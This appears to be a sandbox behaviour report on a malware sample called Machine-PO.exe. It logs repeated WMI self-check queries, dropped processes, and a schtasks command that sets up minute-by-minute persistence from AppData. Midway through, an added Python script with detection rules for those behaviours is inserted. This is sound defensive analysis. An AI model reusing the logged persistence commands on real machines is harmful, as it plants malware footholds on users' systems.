                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
Source: C:\Windows\SysWOW64\wscript.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe' (108 identical entries)
Source: C:\Users\user\Desktop\Machine-PO.exe; File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Machine-PO.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Machine-PO.exe; Virustotal: Detection: 85%
Source: Machine-PO.exe; ReversingLabs: Detection: 92%
Source: C:\Users\user\Desktop\Machine-PO.exe; File read: C:\Users\user\Desktop\Machine-PO.exe
Source: unknown; Process created: C:\Users\user\Desktop\Machine-PO.exe "C:\Users\user\Desktop\Machine-PO.exe"
Source: C:\Users\user\Desktop\Machine-PO.exe; Process created: C:\Users\user\Desktop\._cache_Machine-PO.exe "C:\Users\user\Desktop\._cache_Machine-PO.exe"
Source: C:\Users\user\Desktop\Machine-PO.exe; Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Source: unknown; Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe; Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
Source: unknown; Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
Source: C:\ProgramData\Synaptics\Synaptics.exe; Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
Source: unknown; Process created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
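The process-creation and WMI entries above are the behaviours a detection engineer would want to catch: a dropped binary spawning cmd.exe to register a scheduled task that fires every minute from a user-writable directory, wscript.exe executing a .vbs out of the user's Temp folder, and the script host enumerating Win32_Process to check whether the dropped copy is already running. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample; it parses report-style lines into events and runs three small rules over them. The sample lines are constructed to mirror the entries above (the "Source: parent; event: detail" shape is an assumption of this example, not a log format Joe Sandbox exports), and the rule names and user-writable directory markers are this example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Optional, List

# Constructed sample entries in the shape of the sandbox report lines above
# (parent process; event type; event detail). Not a live log.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\._cache_Machine-PO.exe; Process created: "
    r"C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create "
    r"/tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1",
    r"Source: C:\Users\user\Desktop\._cache_Machine-PO.exe; Process created: "
    r"C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs",
    r"Source: C:\Windows\SysWOW64\wscript.exe; WMI Queries: IWbemServices::ExecQuery - "
    r"root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'",
    r"Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE; "
    r"Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<parent>.+?);\s*(?P<kind>Process created|WMI Queries):\s*(?P<detail>.+)$"
)
# The created image is the first token ending in .exe; the rest is its command line.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)\s+(?P<cmd>.*)$", re.IGNORECASE)
TR_RE = re.compile(r"/tr\s+(?P<target>\S+)", re.IGNORECASE)
SCRIPT_RE = re.compile(r"\S+\.(?:vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Directory markers a standard user can write to (assumed list for this example).
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")


@dataclass(frozen=True)
class Event:
    parent: str   # process that caused the event
    kind: str     # "Process created" or "WMI Queries"
    image: str    # created image path, or "" for a WMI event
    cmd: str      # command line, or the WQL text for a WMI event


@dataclass(frozen=True)
class Finding:
    rule: str
    parent: str
    detail: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def parse_line(line: str) -> Optional[Event]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    parent, kind, detail = m.group("parent"), m.group("kind"), m.group("detail")
    if kind == "WMI Queries":
        return Event(parent, kind, "", detail)
    im = IMAGE_RE.match(detail)
    if not im:
        return None
    return Event(parent, kind, im.group("image"), im.group("cmd"))


def rule_schtasks_minute_persistence(ev: Event) -> Optional[Finding]:
    # cmd.exe/schtasks.exe registering a task that runs every minute from a user-writable path
    if ev.kind != "Process created" or basename(ev.image) not in {"cmd.exe", "schtasks.exe"}:
        return None
    c = ev.cmd.lower()
    if "schtasks" not in c or "/create" not in c or "/sc minute" not in c:
        return None
    tr = TR_RE.search(ev.cmd)
    if not tr or not in_user_writable(tr.group("target")):
        return None
    return Finding("schtasks_minute_persistence", ev.parent, tr.group("target"))


def rule_script_host_from_temp(ev: Event) -> Optional[Finding]:
    # wscript/cscript handed a script file that lives under a Temp directory
    if ev.kind != "Process created" or basename(ev.image) not in SCRIPT_HOSTS:
        return None
    m = SCRIPT_RE.search(ev.cmd)
    if not m or "\\temp\\" not in m.group(0).lower():
        return None
    return Finding("script_host_from_temp", ev.parent, m.group(0))


def rule_wmi_process_enum_from_script_host(ev: Event) -> Optional[Finding]:
    # a script host enumerating Win32_Process: typical "am I already running" self-check
    if ev.kind != "WMI Queries" or basename(ev.parent) not in SCRIPT_HOSTS:
        return None
    if "win32_process" not in ev.cmd.lower():
        return None
    return Finding("wmi_process_enum_from_script_host", ev.parent, ev.cmd)


RULES = (
    rule_schtasks_minute_persistence,
    rule_script_host_from_temp,
    rule_wmi_process_enum_from_script_host,
)


def analyze(lines) -> List[Finding]:
    findings: List[Finding] = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LINES):
        print(f"{f.rule}: parent={f.parent} detail={f.detail}")
```

Two details are worth keeping in mind when tuning this. The WQL `like` in the observed query carries no `%` wildcard, so it behaves as an exact match on the dropped file name: the script is checking for its own copy, not hunting for analysis tools, which is why the rule keys on the script-host parent rather than on the query text. The `/sc minute /mo 1` schedule is the loud part of the persistence; a task pointing into AppData with a one-minute interval has almost no legitimate counterpart on a workstation, so that rule can be left at high severity without much false-positive tuning.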
Source: C:\Users\user\Desktop\Machine-PO.exe; Sections loaded (in order): apphelp.dll, version.dll, wininet.dll, wsock32.dll, netapi32.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, textshaping.dll, propsys.dll, twext.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, policymanager.dll, msvcp110_win.dll, ntshrui.dll, sspicli.dll, windows.fileexplorer.common.dll, iertutil.dll, profapi.dll, srvcli.dll, cscapi.dll, netutils.dll, shacct.dll, idstore.dll, twinapi.appcore.dll, samlib.dll, starttiledata.dll, acppage.dll, sfc.dll, msi.dll, aepic.dll, sfc_os.dll, ntmarta.dll, cryptsp.dll, wlidprov.dll, samcli.dll, provsvc.dll, edputil.dll, urlmon.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, twext.dll, ntshrui.dll, starttiledata.dll, acppage.dll, sfc.dll, msi.dll, aepic.dll, cryptsp.dll, sfc_os.dll
Source: C:\Users\user\Desktop\._cache_Machine-PO.exe; Sections loaded (in order): apphelp.dll, wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, propsys.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, amsi.dll, profapi.dll, sxs.dll, sspicli.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
